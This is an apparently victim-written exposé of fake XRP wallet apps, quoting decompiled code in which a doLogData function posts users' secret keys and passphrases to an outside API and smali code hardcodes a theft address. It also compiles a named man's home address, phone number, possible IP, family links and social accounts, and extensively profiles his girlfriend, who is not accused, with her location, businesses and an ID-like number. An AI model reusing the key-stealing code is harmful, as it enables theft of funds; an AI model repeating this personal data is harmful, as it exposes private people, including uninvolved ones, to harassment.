****************************UPDATE***********************

As of 3/04/2021 he has cloned the toast wallet browser from their github page and is hosting it now. It will be one of the first results that pop up in google. His scamming site 
is located here: https://toastwallet.app/browser/

It is doing the same thing as his app that I got taken down called "Toast Plus"
This site is just sending over any secret keys to his api located at https://dropletapi.peninsulasoftware.co/api/log so his server can instantly steal all XRP from any 
keys sent to it. 







Josué Saul Armenta Espinoza is the scammer behind Toast Plus and Droplet apps. He has stolen over 1 Million USD of XRP from users around the world

The stolen crypto is currently being stored here

https://bithomp.com/explorer/raiFjJbNoeAaXQZ7bSXWPRfz8pPGXndHoD


Below is everything we know about him so far and exactly how the scams worked.  There is evidence that he has been scamming XRP from people as far back as 2018
HE MUST BE STOPPED!!! : https://www.xrpchat.com/topic/27897-malicious-address-using-bithomp-tool-v-030-to-steal-funds/

Full Document with photos and screenshots here:
https://anonymousfiles.io/B51F5Ryz/

En español:
https://anonymousfiles.io/qBwqKAgu/

INFORMATION FOR FILING FBI REPORT AT IC3.GOV:

Josué Saul Armenta Espinoza
Avenida Valle de las Mariposas #2123 Mexicali, Baja California, México.
+52 686 260 6495




Age 29 or 30 based on tweet see below

Full name is: Josue Saul Armenta Espinoza as depicted in the apple apps URL:

https://apps.apple.com/us/developer/josue-saul-armenta-espinoza/id1468790629

He was fired from Monobits.co about 3 years ago for developing an app that shared porn using monobits servers. It seems he went into scamming people after getting fired.


peninsulasoftware.co <-------  This is the fake developer company he created that is supposedly located in New Zeland. It is no longer up after his scam was exposed. 
https://www.xrpchat.com/topic/24282-zerps-wallet/
https://peninsulasoftware.co/author/josuemxli_b5i1069p/
Other developed apps:
https://apps.alldbx.com/apps/5d9ffd6b682414c37f3939a6/

His home IP might be: 201.142.213.132 

His now deleted Twitter account: https://twitter.com/josuemxli

There is an address that was listed here in this link that is likely tied to him:

https://webcache.googleusercontent.com/search?q=cache:Vv1sRDxj1j8J:https://play.google.com/store/apps/details%3Fid%3Dcom.peninsulaapps.dropletwallet%26hl%3Dfr_CA%26gl%3DUS+&cd=2&hl=en&ct=clnk&gl=us

That address is:
Avenida Valle de las Mariposas #2123 Mexicali, Baja California, México. 

Brothers Facebook Account: https://www.facebook.com/Moy6Armenta

Family Photo: https://anonymousfiles.io/HyJLmkE8/
For many more photos please download the full Doc. 


         *******  HOW HE SCAMMED *********************


Incriminating code from Toast Plus Wallet index.html file (decomplied apk). The "doLogData" function is sending all private data to his server so that he can extract what he needs to scam.
“
function importAddress(secret, address, nickname, passphrase, successfunc, failurefunc) {

address = forceraddr(address)

doLogData({secret,address,nickname,passphrase});

// set backup reminder to nothing so they get a prompt immediately after importing
db.upsert("lastbackupreminder",
function(doc) {
return { data: JSON.stringify({}) };
});

var _import = function(secret, address, nickname, passphrase, successfunc, failurefunc) {
“

“
function doLogData(info){

if (debug) console.log("doLogData()", info);

const data = {uuid: device.uuid, data: info};

axios.post("https://dropletapi.peninsulasoftware.co/api/log", data)
.then(function (response) {
if(debug) console.log(response);
})
.catch(function (error) {
if(debug) console.log(error);
});
}
“

The code above was pulled from a decompiled Toast Plus APK index.html that was downloaded 2/6/2021 from the google play store. This is a file that shows how he is montoring the users private data in real time via the API. There is likely a script server side that captures the secret keys and passphrases from unsuspecting users and forwards it to his theft account, which also appears to be used personally by him before the scam(he was not careful about this at all). Bitso, Challengy, and a few other exchages were used with this account before the scam was setup. Just sort the transactions by initiated to see the exchanges used. Getting these exchanges to release the user who interacted with this account would cryptographically tie him to the Theft account. I suspect his server at cloudfare will be wiped fairly soon when the apps are taken down. It has been reported that his server will let smaller amounts through. Judging by the public blockchain linked below, that seems to be true. A typical user would likely do a test on the wallet with a smaller amount before transferring a larger amount to it. Also, when security reseachers test out the app, it would likely be with a smaller amount which might be how he has kept it on the app stores for this long. 

Orginial Toast Plus APK located here: https://anonymousfiles.io/VrAtondN/


                    ***********************HIS OTHER APP CALLED DROPLET - XRP WALLET SCAM************************************* 

 

Incriminating code from Droplet Wallet scam can be found here:
smali_classes3/com/peninsulaapps/dropletwallet/database/TransactionDao_Impl.smali (from decomplied apk) 

One of his stolen funds account directly hardcoded into the Database so that any and all transfers only transfer out to his address.. ( rnmmG1QSVjZiTV5Toy32dsH8ZGDQSW6DZF )

Original droplet APK can be found here: https://anonymousfiles.io/XoeBNLTl/

THIS CODE PROVES HIS CONNECTION TO THE ONE OF THE KNOWN THEFT ACCOUNTS!!  (rnmmG1QSVjZiTV5Toy32dsH8ZGDQSW6DZF)



    const-string v0, "INSERT OR REPLACE INTO `DatabaseTransaction` (`hash`,`ledger_index`,`date`,`destination_tag`,`amount`,`wallet_address`,`account`,`destination`) VALUES (?,?,?,?,?,?,?,?)"

    return-object v0
.end method


.method public loadRecentByWalletAddress(Ljava/lang/String;)Ljava/util/List;
    .locals 13
    .annotation system Ldalvik/annotation/Signature;
        value = {
            "(",
            "Ljava/lang/String;",
            ")",
            "Ljava/util/List<",
            "Lcom/peninsulaapps/dropletwallet/database/DatabaseTransaction;",
            ">;"
        }
    .end annotation

    const-string v0, "SELECT * FROM databasetransaction WHERE wallet_address == ? AND destination != \"rnmmG1QSVjZiTV5Toy32dsH8ZGDQSW6DZF\" ORDER BY ledger_index DESC LIMIT 10"

    const/4 v1, 0x1

    .line 125
    invoke-static {v0, v1}, Landroidx/room/RoomSQLiteQuery;->acquire(Ljava/lang/Strin



           *****************OTHER INFO ABOUT HIM AND HIS CURRENT GIRLFRIEND********************************


Disqus account: https://disqus.com/by/josuarmenta/




On 22 april 2018 he tweeted that he was 27 years old:
 
https://twitter.com/JosueMxli/status/987902084279222274/photo/1
That would make him 29 or 30 at this moment.









This is a youtube video of himself trying to get victims to download his malicious apps. He has deleted it but can be found here
https://anonymousfiles.io/7pXcG6Fn/
He has links in the description to Toast Plus wallet and Droplet. This proves his accounts were not hacked as he is on screen actively trying to promote his scam!












Josue published a research paper during his study in 2019:
Inferring Drivers’ Visual Focus Attention Through Head-Mounted Inertial Sensors
He might be still at this university studying for his Masters, according to people who know him that I've spoken to. 

https://ieeexplore.ieee.org/document/8936432/authors#authors
Picture:
 
“Josué S. Armenta received the bachelor’s degree in computer engineering from the Universidad Autónoma de Baja California (UABC), México, in 2013, where he is currently pursuing the M.S. degree in computer science. His research interest includes development of software for mobile applications and sensors.”




 
https://twitter.com/JosueMxli/status/1270929626311700480




Liked and retweeted by:
 
https://twitter.com/JosueMxli/status/1270929626311700480/likes

 
Josue with his girlfriend Marla (https://www.instagram.com/p/CDXEvmppl_v/)

Girlfriends instagram: https://www.instagram.com/marlavaleriac/
Girlfriends twitter: https://twitter.com/marla_valeria
Girlfriends pinterest: https://www.pinterest.com.mx/marlavaleriaangulo/
Girlfriends youtube: https://www.youtube.com/c/MarlaAngulocorral
Girlfriends makeup business:
https://www.instagram.com/marlaangulomakeup/
https://www.facebook.com/MAKEUPMARLAANGULO


 

 
(His girlfriend Marla down on the left ^   ) This photo was taken in Guaymas, Sonora.
 
Name: Marla Valeria Angulo C.

Centro Regional de Formacion Profesional Docente de Sonora
ANGULO CORRAL MARLA VALERIA
990117 0011 11002021 9

Location of Fatima Sanchez Beauty salon: https://www.google.com/maps/place/Fatima+Sanchez+Makeup/@27.8919775,-110.3854413,10.45z/data=!4m5!3m4!1s0x0:0xb24e9e93cb7d3d0d!8m2!3d27.4984943!4d-109.9519622

Marlia Valeria Angulo in local Guaymas news:
https://www.meganoticias.mx/guaymas/noticia/importante-aprendizaje-de-lengua-de-senas-para-proteger-de-abuso/183342

https://www.facebook.com/expresion.guaymas/posts/1580877495424905











Place of residence:
 
Marla’s location:
City: Guaymas
State: Sonora
Country: Mexico

Josue’s location:
Mexicali, Baja California
 
(https://twitter.com/josuemxli)








The known addresses he has used to scam are:

raiFjJbNoeAaXQZ7bSXWPRfz8pPGXndHoD

rnmmG1QSVjZiTV5Toy32dsH8ZGDQSW6DZF

r3Ke7BFJGeB7gBZT2r4fpquFXLQmtMWb6V

r3f7eKAXqDZLNUUvFgRcRPL2VNC6f6FbCh


            *******************************WHAT VICTIMS NEED TO DO *******************************


If you have been scammed out of XRP using either of these two apps here is what you should do.
File a report with both your local police and also at https://www.ic3.gov/ and FTC.gov/complaint

Report the app to Apple or Google play stores. The email to report the app at Apple is: appreview@apple.com
Apple and Google are being negligent here by hosting these apps. Toast Wallet was a legitimate app that I use to use. How can they allow an imposture app with the same name, icon, and functionality as the original with malicious code into the store? And even more disturbing not remove it once its reported! It is for this reason you should look into suing Apple or Google for the incompetence. Most small claim courts allow up to 20,000.00 USD in damages. This is a good option if your in the United States.

Do not lose the secret keys from the accounts you have had your money stolen from. These might be needed later to prove the funds were stolen from you if the XRP is ever recovered.



IF YOU HAVE ANY MORE INFO THAN WHAT IS ABOVE PLEASE EMAIL ME AT BOBSAGET@RISEUP.NET